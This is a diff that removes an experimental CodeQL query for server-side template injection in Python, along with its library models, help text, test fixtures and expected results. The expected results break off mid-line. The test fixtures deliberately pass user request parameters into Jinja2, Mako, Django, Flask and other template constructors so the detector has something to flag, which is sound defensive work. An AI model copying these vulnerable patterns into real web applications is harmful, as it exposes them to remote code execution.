a/python/ql/src/experimental/Security/CWE-074/TemplateConstructionConcept.qll +++ /dev/null 
@@ -1,165 +0,0 @@ -private import python -private import semmle.python.dataflow.new.DataFlow -private import semmle.python.ApiGraphs - -/** - * A data-flow node that constructs a template. - * - * Extend this class to refine existing API models. If you want to model new APIs, - * extend `TemplateConstruction::Range` instead. - */ -class TemplateConstruction extends DataFlow::Node instanceof TemplateConstruction::Range { - /** Gets the argument that specifies the template source. */ - DataFlow::Node getSourceArg() { result = super.getSourceArg() } -} - -/** Provides a class for modeling new system-command execution APIs. */ -module TemplateConstruction { - /** - * A data-flow node that constructs a template. - * - * Extend this class to model new APIs. If you want to refine existing API models, - * extend `TemplateConstruction` instead. - */ - abstract class Range extends DataFlow::Node { - /** Gets the argument that specifies the template source. */ - abstract DataFlow::Node getSourceArg(); - } -} - -// ----------------------------------------------------------------------------- -/** A call to `airspeed.Template`. */ -class AirspeedTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - AirspeedTemplateConstruction() { - this = API::moduleImport("airspeed").getMember("Template").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `bottle.SimpleTemplate`. */ -class BottleSimpleTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - BottleSimpleTemplateConstruction() { - this = API::moduleImport("bottle").getMember("SimpleTemplate").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `bottle.template`. 
*/ -class BottleTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - BottleTemplateConstruction() { - this = API::moduleImport("bottle").getMember("template").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `chameleon.PageTemplate`. */ -class ChameleonTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - ChameleonTemplateConstruction() { - this = API::moduleImport("chameleon").getMember("PageTemplate").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `Cheetah.Template.Template`. */ -class CheetahTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - CheetahTemplateConstruction() { - this = - API::moduleImport("Cheetah") - .getMember("Template") - .getMember("Template") - .getASubclass*() - .getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `chevron.render`. */ -class ChevronRenderConstruction extends TemplateConstruction::Range, API::CallNode { - ChevronRenderConstruction() { this = API::moduleImport("chevron").getMember("render").getACall() } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `django.template.Template` */ -class DjangoTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - DjangoTemplateConstruction() { - this = API::moduleImport("django").getMember("template").getMember("Template").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -// TODO: support django.template.engines["django"]].from_string -/** A call to `flask.render_template_string`. 
*/ -class FlaskTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - FlaskTemplateConstruction() { - this = API::moduleImport("flask").getMember("render_template_string").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `genshi.template.TextTemplate`. */ -class GenshiTextTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - GenshiTextTemplateConstruction() { - this = API::moduleImport("genshi").getMember("template").getMember("TextTemplate").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `genshi.template.MarkupTemplate` */ -class GenshiMarkupTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - GenshiMarkupTemplateConstruction() { - this = API::moduleImport("genshi").getMember("template").getMember("MarkupTemplate").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -// -/** A call to `jinja2.Template`. */ -class Jinja2TemplateConstruction extends TemplateConstruction::Range, API::CallNode { - Jinja2TemplateConstruction() { - this = API::moduleImport("jinja2").getMember("Template").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `jinja2.from_string`. */ -class Jinja2FromStringConstruction extends TemplateConstruction::Range, API::CallNode { - Jinja2FromStringConstruction() { - this = - API::moduleImport("jinja2") - .getMember("Environment") - .getReturn() - .getMember("from_string") - .getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `mako.template.Template`. 
*/ -class MakoTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - MakoTemplateConstruction() { - this = API::moduleImport("mako").getMember("template").getMember("Template").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} - -/** A call to `trender.TRender`. */ -class TRenderTemplateConstruction extends TemplateConstruction::Range, API::CallNode { - TRenderTemplateConstruction() { - this = API::moduleImport("trender").getMember("TRender").getACall() - } - - override DataFlow::Node getSourceArg() { result = this.getArg(0) } -} diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateInjection.qhelp b/python/ql/src/experimental/Security/CWE-074/TemplateInjection.qhelp deleted file mode 100644 index b044243fc8e..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/TemplateInjection.qhelp +++ /dev/null @@ -1,24 +0,0 @@ - - - -

    - Template Injection occurs when user input is embedded in a template in an unsafe manner. - When an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side is results in Server Side Template Injection. -

    -
    - -

    - To fix this, ensure that an untrusted value is not used as a template. If the application requirements do not alow this, use a sandboxed environment where access to unsafe attributes and methods is prohibited. -

    -
    - -

    Consider the example given below, an untrusted HTTP parameter `template` is used to generate a Jinja2 template string. This can lead to remote code execution.

    - - -

    Here we have fixed the problem by using the Jinja sandbox environment for evaluating untrusted code.

    - -
    - -
  • Portswigger : [Server Side Template Injection](https://portswigger.net/web-security/server-side-template-injection)
  • -
    -
    diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateInjection.ql b/python/ql/src/experimental/Security/CWE-074/TemplateInjection.ql deleted file mode 100644 index a10ad09a6ac..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/TemplateInjection.ql +++ /dev/null @@ -1,20 +0,0 @@ -/** - * @name Server Side Template Injection - * @description Using user-controlled data to create a template can cause security issues. - * @kind path-problem - * @problem.severity error - * @precision high - * @id py/template-injection - * @tags security - * experimental - * external/cwe/cwe-074 - */ - -import python -import TemplateInjectionQuery -import TemplateInjectionFlow::PathGraph - -from TemplateInjectionFlow::PathNode source, TemplateInjectionFlow::PathNode sink -where TemplateInjectionFlow::flowPath(source, sink) -select sink.getNode(), source, sink, "This Template depends on $@.", source.getNode(), - "user-provided value" diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll b/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll deleted file mode 100644 index 13c70fc7d04..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/TemplateInjectionCustomizations.qll +++ /dev/null 
@@ -1,59 +0,0 @@ -/** - * Provides default sources, sinks and sanitizers for detecting - * "template injection" - * vulnerabilities, as well as extension points for adding your own. - */ - -private import python -private import semmle.python.dataflow.new.DataFlow -private import semmle.python.Concepts as C -private import semmle.python.dataflow.new.RemoteFlowSources -private import semmle.python.dataflow.new.BarrierGuards -private import TemplateConstructionConcept - -/** - * Provides default sources, sinks and sanitizers for detecting - * "template injection" - * vulnerabilities, as well as extension points for adding your own. - */ -module TemplateInjection { - /** - * A data flow source for "template injection" vulnerabilities. - */ - abstract class Source extends DataFlow::Node { } - - /** - * A data flow sink for "template injection" vulnerabilities. - */ - abstract class Sink extends DataFlow::Node { } - - /** - * A sanitizer for "template injection" vulnerabilities. - */ - abstract class Sanitizer extends DataFlow::Node { } - - /** - * DEPRECATED: Use `ActiveThreatModelSource` from Concepts instead! - */ - deprecated class RemoteFlowSourceAsSource = ActiveThreatModelSourceAsSource; - - /** - * An active threat-model source, considered as a flow source. - */ - private class ActiveThreatModelSourceAsSource extends Source, C::ActiveThreatModelSource { } - - /** - * A SQL statement of a SQL construction, considered as a flow sink. - */ - class TemplateConstructionAsSink extends Sink { - TemplateConstructionAsSink() { this = any(TemplateConstruction c).getSourceArg() } - } - - /** - * A comparison with a constant, considered as a sanitizer-guard. - */ - class ConstCompareAsSanitizerGuard extends Sanitizer, ConstCompareBarrier { } - - /** DEPRECATED: Use ConstCompareAsSanitizerGuard instead. */ - deprecated class StringConstCompareAsSanitizerGuard = ConstCompareAsSanitizerGuard; -} 
diff --git a/python/ql/src/experimental/Security/CWE-074/TemplateInjectionQuery.qll b/python/ql/src/experimental/Security/CWE-074/TemplateInjectionQuery.qll deleted file mode 100644 index 111485e2602..00000000000 --- a/python/ql/src/experimental/Security/CWE-074/TemplateInjectionQuery.qll +++ /dev/null @@ -1,18 +0,0 @@ -/** - * Provides a taint-tracking configuration for detecting "template injection" vulnerabilities. - */ - -private import python -import semmle.python.dataflow.new.DataFlow -import semmle.python.dataflow.new.TaintTracking -import TemplateInjectionCustomizations::TemplateInjection - -module TemplateInjectionConfig implements DataFlow::ConfigSig { - predicate isSource(DataFlow::Node node) { node instanceof Source } - - predicate isSink(DataFlow::Node node) { node instanceof Sink } - - predicate isBarrierIn(DataFlow::Node node) { node instanceof Sanitizer } -} - -module TemplateInjectionFlow = TaintTracking::Global; diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/AirspeedSsti.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/AirspeedSsti.py deleted file mode 100644 index 8938d8602f8..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/AirspeedSsti.py +++ /dev/null @@ -1,11 +0,0 @@ -import airspeed -from flask import Flask, request - - -app = Flask(__name__) - - -@route('/other') -def a(): - template = request.args.get('template') - return airspeed.Template(template) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/BottleSsti.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/BottleSsti.py deleted file mode 100644 index b5f8a5feeff..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/BottleSsti.py +++ /dev/null 
@@ -1,20 +0,0 @@ -from bottle import Bottle, route, request, redirect, response, SimpleTemplate -from bottle import template as temp - - -app = Bottle() - - -@route('/other') -def a(): - template = request.query.template - tpl = SimpleTemplate(template) - tpl.render(name='World') - return tmp - - -@route('/other2') -def b(): - template = request.query.template - temp(template, name='World') - return tmp diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Chameleon.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Chameleon.py deleted file mode 100644 index f58a641a9be..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Chameleon.py +++ /dev/null @@ -1,10 +0,0 @@ -from chameleon import PageTemplate -from django.urls import path -from django.http import HttpResponse - - -def chameleon(request): - template = request.GET['template'] - tmpl = PageTemplate(template) - return HttpResponse(tmpl) - diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/CheetahSinks.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/CheetahSinks.py deleted file mode 100644 index 7f9fed4decf..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/CheetahSinks.py +++ /dev/null @@ -1,22 +0,0 @@ -from flask import Flask, request -from Cheetah.Template import Template - - -app = Flask(__name__) - - -@app.route('/other') -def a(): - template = request.args.get('template') - return Template(template) - - -class Template3(Template): - title = 'Hello World Example!' - contents = 'Hello World!' - - -@app.route('/other2') -def b(): - template = request.args.get('template') - t3 = Template3(template) 
diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/ChevronSsti.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/ChevronSsti.py deleted file mode 100644 index f3b0e57fc8f..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/ChevronSsti.py +++ /dev/null @@ -1,24 +0,0 @@ -from flask import Flask, request -import chevron - - -app = Flask(__name__) - - -@app.route('/other') -def a(): - template = request.args.get('template') - return chevron.render(template, {"key": "value"}) - - -@app.route('/other2') -def b(): - template = request.args.get('template') - args = { - 'template': template, - - 'data': { - 'key': 'value' - } - } - return chevron.render(**args) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/DjangoTemplates.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/DjangoTemplates.py deleted file mode 100644 index 26f48fd9278..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/DjangoTemplates.py +++ /dev/null 
@@ -1,41 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from django.template import Template, Context, Engine, engines - - -def dj(request): - # Load the template - template = request.GET['template'] - t = Template(template) - ctx = Context(locals()) - html = t.render(ctx) - return HttpResponse(html) - - -def djEngine(request): - # Load the template - template = request.GET['template'] - - django_engine = engines['django'] - t = django_engine.from_string(template) - ctx = Context(locals()) - html = t.render(ctx) - return HttpResponse(html) - - -def djEngineJinja(request): - # Load the template - template = request.GET['template'] - - django_engine = engines['jinja'] - t = django_engine.from_string(template) - ctx = Context(locals()) - html = t.render(ctx) - return HttpResponse(html) - - -urlpatterns = [ - path('', dj), - path('', djEngine), - path('', djEngineJinja), -] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/FlaskTemplate.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/FlaskTemplate.py deleted file mode 100644 index b74e3cce715..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/FlaskTemplate.py +++ /dev/null @@ -1,22 +0,0 @@ -from flask import Flask, request - - -app = Flask(__name__) - - -@app.route("/") -def home(): - from flask import render_template_string - if request.args.get('template'): - return render_template_string(request.args.get('template')) - - -@app.route("/a") -def a(): - import flask - return flask.render_template_string(request.args.get('template')) - - - -if __name__ == "__main__": - app.run(debug=True) diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Genshi.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Genshi.py deleted file mode 100644 index 7800c50da96..00000000000 
--- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/Genshi.py +++ /dev/null @@ -1,18 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from genshi.template import TextTemplate,MarkupTemplate - -def genshi1(): - template = request.GET['template'] - tmpl = MarkupTemplate(template) - return HttpResponse(tmpl) - -def genshi2(): - template = request.GET['template'] - tmpl = TextTemplate(template) - return HttpResponse(tmpl) - -urlpatterns = [ - path('', genshi1), - path('', genshi2) -] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py deleted file mode 100644 index 28225c81cba..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/JinjaSsti.py +++ /dev/null @@ -1,30 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from jinja2 import Template as Jinja2_Template -from jinja2 import Environment, DictLoader, escape - - -def a(request): - # Load the template - template = request.GET['template'] - t = Jinja2_Template(template) - name = request.GET['name'] - # Render the template with the context data - html = t.render(name=escape(name)) - return HttpResponse(html) - -def b(request): - import jinja2 - # Load the template - template = request.GET['template'] - t = jinja2.from_string(template) - name = request.GET['name'] - # Render the template with the context data - html = t.render(name=escape(name)) - return HttpResponse(html) - - -urlpatterns = [ - path('a', a), - path('b', b) -] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/MakoSsti.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/MakoSsti.py deleted file mode 100644 index 7f6b25cb26c..00000000000 
--- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/MakoSsti.py +++ /dev/null @@ -1,15 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from mako.template import Template - - -def mako(request): - # Load the template - template = request.GET['template'] - mytemplate = Template(template) - return HttpResponse(mytemplate) - - -urlpatterns = [ - path('', mako) -] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TRender.py b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TRender.py deleted file mode 100644 index 2514f22b805..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TRender.py +++ /dev/null @@ -1,12 +0,0 @@ -from django.urls import path -from django.http import HttpResponse -from trender import TRender - -def trender(request): - template = request.GET['template'] - compiled = TRender(template) - return HttpResponse(compiled) - -urlpatterns = [ - path('', trender) -] diff --git a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected b/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected deleted file mode 100644 index 06cf81cc6aa..00000000000 --- a/python/ql/test/experimental/query-tests/Security/CWE-074-TemplateInjection/TemplateInjection.expected +++ /dev/null 
@@ -1,107 +0,0 @@ -edges -| AirspeedSsti.py:2:26:2:32 | ControlFlowNode for ImportMember | AirspeedSsti.py:2:26:2:32 | ControlFlowNode for request | provenance | | -| AirspeedSsti.py:2:26:2:32 | ControlFlowNode for request | AirspeedSsti.py:10:16:10:22 | ControlFlowNode for request | provenance | | -| AirspeedSsti.py:10:5:10:12 | ControlFlowNode for template | AirspeedSsti.py:11:30:11:37 | ControlFlowNode for template | provenance | | -| AirspeedSsti.py:10:16:10:22 | ControlFlowNode for request | AirspeedSsti.py:10:16:10:27 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| AirspeedSsti.py:10:16:10:27 | ControlFlowNode for Attribute | AirspeedSsti.py:10:16:10:43 | ControlFlowNode for Attribute() | provenance | dict.get | -| AirspeedSsti.py:10:16:10:43 | ControlFlowNode for Attribute() | AirspeedSsti.py:10:5:10:12 | ControlFlowNode for template | provenance | | -| CheetahSinks.py:1:26:1:32 | ControlFlowNode for ImportMember | CheetahSinks.py:1:26:1:32 | ControlFlowNode for request | provenance | | -| CheetahSinks.py:1:26:1:32 | ControlFlowNode for request | CheetahSinks.py:10:16:10:22 | ControlFlowNode for request | provenance | | -| CheetahSinks.py:1:26:1:32 | ControlFlowNode for request | CheetahSinks.py:21:16:21:22 | ControlFlowNode for request | provenance | | -| CheetahSinks.py:10:5:10:12 | ControlFlowNode for template | CheetahSinks.py:11:21:11:28 | ControlFlowNode for template | provenance | | -| CheetahSinks.py:10:16:10:22 | ControlFlowNode for request | CheetahSinks.py:10:16:10:27 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| CheetahSinks.py:10:16:10:27 | ControlFlowNode for Attribute | CheetahSinks.py:10:16:10:43 | ControlFlowNode for Attribute() | provenance | dict.get | -| CheetahSinks.py:10:16:10:43 | ControlFlowNode for Attribute() | CheetahSinks.py:10:5:10:12 | ControlFlowNode for template | provenance | | -| CheetahSinks.py:21:5:21:12 | ControlFlowNode for template | CheetahSinks.py:22:20:22:27 | 
ControlFlowNode for template | provenance | | -| CheetahSinks.py:21:16:21:22 | ControlFlowNode for request | CheetahSinks.py:21:16:21:27 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| CheetahSinks.py:21:16:21:27 | ControlFlowNode for Attribute | CheetahSinks.py:21:16:21:43 | ControlFlowNode for Attribute() | provenance | dict.get | -| CheetahSinks.py:21:16:21:43 | ControlFlowNode for Attribute() | CheetahSinks.py:21:5:21:12 | ControlFlowNode for template | provenance | | -| ChevronSsti.py:1:26:1:32 | ControlFlowNode for ImportMember | ChevronSsti.py:1:26:1:32 | ControlFlowNode for request | provenance | | -| ChevronSsti.py:1:26:1:32 | ControlFlowNode for request | ChevronSsti.py:10:16:10:22 | ControlFlowNode for request | provenance | | -| ChevronSsti.py:10:5:10:12 | ControlFlowNode for template | ChevronSsti.py:11:27:11:34 | ControlFlowNode for template | provenance | | -| ChevronSsti.py:10:16:10:22 | ControlFlowNode for request | ChevronSsti.py:10:16:10:27 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| ChevronSsti.py:10:16:10:27 | ControlFlowNode for Attribute | ChevronSsti.py:10:16:10:43 | ControlFlowNode for Attribute() | provenance | dict.get | -| ChevronSsti.py:10:16:10:43 | ControlFlowNode for Attribute() | ChevronSsti.py:10:5:10:12 | ControlFlowNode for template | provenance | | -| DjangoTemplates.py:6:8:6:14 | ControlFlowNode for request | DjangoTemplates.py:8:5:8:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | -| DjangoTemplates.py:8:5:8:12 | ControlFlowNode for template | DjangoTemplates.py:9:18:9:25 | ControlFlowNode for template | provenance | | -| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for ImportMember | FlaskTemplate.py:1:26:1:32 | ControlFlowNode for request | provenance | | -| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for request | FlaskTemplate.py:10:8:10:14 | ControlFlowNode for request | provenance | | -| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for request | 
FlaskTemplate.py:11:39:11:45 | ControlFlowNode for request | provenance | | -| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for request | FlaskTemplate.py:17:41:17:47 | ControlFlowNode for request | provenance | | -| FlaskTemplate.py:10:8:10:14 | ControlFlowNode for request | FlaskTemplate.py:11:39:11:50 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| FlaskTemplate.py:11:39:11:45 | ControlFlowNode for request | FlaskTemplate.py:11:39:11:50 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| FlaskTemplate.py:11:39:11:50 | ControlFlowNode for Attribute | FlaskTemplate.py:11:39:11:66 | ControlFlowNode for Attribute() | provenance | dict.get | -| FlaskTemplate.py:17:41:17:47 | ControlFlowNode for request | FlaskTemplate.py:17:41:17:52 | ControlFlowNode for Attribute | provenance | AdditionalTaintStep | -| FlaskTemplate.py:17:41:17:52 | ControlFlowNode for Attribute | FlaskTemplate.py:17:41:17:68 | ControlFlowNode for Attribute() | provenance | dict.get | -| JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | -| JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | JinjaSsti.py:10:25:10:32 | ControlFlowNode for template | provenance | | -| JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | -| JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | JinjaSsti.py:20:28:20:35 | ControlFlowNode for template | provenance | | -| MakoSsti.py:6:10:6:16 | ControlFlowNode for request | MakoSsti.py:8:5:8:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | -| MakoSsti.py:8:5:8:12 | ControlFlowNode for template | MakoSsti.py:9:27:9:34 | ControlFlowNode for template | provenance | | -| TRender.py:5:13:5:19 | ControlFlowNode for request | TRender.py:6:5:6:12 | ControlFlowNode for template | provenance | AdditionalTaintStep | -| 
TRender.py:6:5:6:12 | ControlFlowNode for template | TRender.py:7:24:7:31 | ControlFlowNode for template | provenance | | -nodes -| AirspeedSsti.py:2:26:2:32 | ControlFlowNode for ImportMember | semmle.label | ControlFlowNode for ImportMember | -| AirspeedSsti.py:2:26:2:32 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| AirspeedSsti.py:10:5:10:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| AirspeedSsti.py:10:16:10:22 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| AirspeedSsti.py:10:16:10:27 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | -| AirspeedSsti.py:10:16:10:43 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | -| AirspeedSsti.py:11:30:11:37 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| CheetahSinks.py:1:26:1:32 | ControlFlowNode for ImportMember | semmle.label | ControlFlowNode for ImportMember | -| CheetahSinks.py:1:26:1:32 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| CheetahSinks.py:10:5:10:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| CheetahSinks.py:10:16:10:22 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| CheetahSinks.py:10:16:10:27 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | -| CheetahSinks.py:10:16:10:43 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | -| CheetahSinks.py:11:21:11:28 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| CheetahSinks.py:21:5:21:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| CheetahSinks.py:21:16:21:22 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| CheetahSinks.py:21:16:21:27 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for 
Attribute | -| CheetahSinks.py:21:16:21:43 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | -| CheetahSinks.py:22:20:22:27 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| ChevronSsti.py:1:26:1:32 | ControlFlowNode for ImportMember | semmle.label | ControlFlowNode for ImportMember | -| ChevronSsti.py:1:26:1:32 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| ChevronSsti.py:10:5:10:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| ChevronSsti.py:10:16:10:22 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| ChevronSsti.py:10:16:10:27 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | -| ChevronSsti.py:10:16:10:43 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | -| ChevronSsti.py:11:27:11:34 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| DjangoTemplates.py:6:8:6:14 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| DjangoTemplates.py:8:5:8:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| DjangoTemplates.py:9:18:9:25 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for ImportMember | semmle.label | ControlFlowNode for ImportMember | -| FlaskTemplate.py:1:26:1:32 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| FlaskTemplate.py:10:8:10:14 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| FlaskTemplate.py:11:39:11:45 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| FlaskTemplate.py:11:39:11:50 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | -| FlaskTemplate.py:11:39:11:66 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for 
Attribute() | -| FlaskTemplate.py:17:41:17:47 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| FlaskTemplate.py:17:41:17:52 | ControlFlowNode for Attribute | semmle.label | ControlFlowNode for Attribute | -| FlaskTemplate.py:17:41:17:68 | ControlFlowNode for Attribute() | semmle.label | ControlFlowNode for Attribute() | -| JinjaSsti.py:7:7:7:13 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| JinjaSsti.py:9:5:9:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| JinjaSsti.py:10:25:10:32 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| JinjaSsti.py:16:7:16:13 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| JinjaSsti.py:19:5:19:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| JinjaSsti.py:20:28:20:35 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| MakoSsti.py:6:10:6:16 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| MakoSsti.py:8:5:8:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| MakoSsti.py:9:27:9:34 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| TRender.py:5:13:5:19 | ControlFlowNode for request | semmle.label | ControlFlowNode for request | -| TRender.py:6:5:6:12 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -| TRender.py:7:24:7:31 | ControlFlowNode for template | semmle.label | ControlFlowNode for template | -subpaths -#select -| AirspeedSsti.py:11:30:11:37 | ControlFlowNode for template | AirspeedSsti.py:2:26:2:32 | ControlFlowNode for ImportMember | AirspeedSsti.py:11:30:11:37 | ControlFlowNode for template | This Template depends on $@. 
| AirspeedSsti.py:2:26:2:32 | ControlFlowNode for ImportMember | user-provided value | -| CheetahSinks.py:11:21:11:28 | ControlFlowNode for template | CheetahSinks.py:1:26:1:32 | ControlFlowNode for ImportMember | CheetahSinks.py:11:21:11:28 | ControlFlowNode for template | This Template depends on $@. | CheetahSinks.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| CheetahSinks.py:22:20:22:27 | ControlFlowNode for template | CheetahSinks.py:1:26:1:32 | ControlFlowNode for ImportMember | CheetahSinks.py:22:20:22:27 | ControlFlowNode for template | This Template depends on $@. | CheetahSinks.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| ChevronSsti.py:11:27:11:34 | ControlFlowNode for template | ChevronSsti.py:1:26:1:32 | ControlFlowNode for ImportMember | ChevronSsti.py:11:27:11:34 | ControlFlowNode for template | This Template depends on $@. | ChevronSsti.py:1:26:1:32 | ControlFlowNode for ImportMember | user-provided value | -| DjangoTemplates.py:9:18:9:25 | ControlFlowNode for template | DjangoTemplates.py:6:8:6:14 | ControlFlowNode for request | DjangoTemplates.py:9:18:9:25 | ControlFlowNode for template | This Template depends on $@. | DjangoTemplates.py:6:8:6:14 | ControlFlowNode for request | user-provided value | -| FlaskTemplate.py:11:39:11:66 | ControlFlowNode for Attribute() | FlaskTemplate.py:1:26:1:32 | ControlFlowNode for 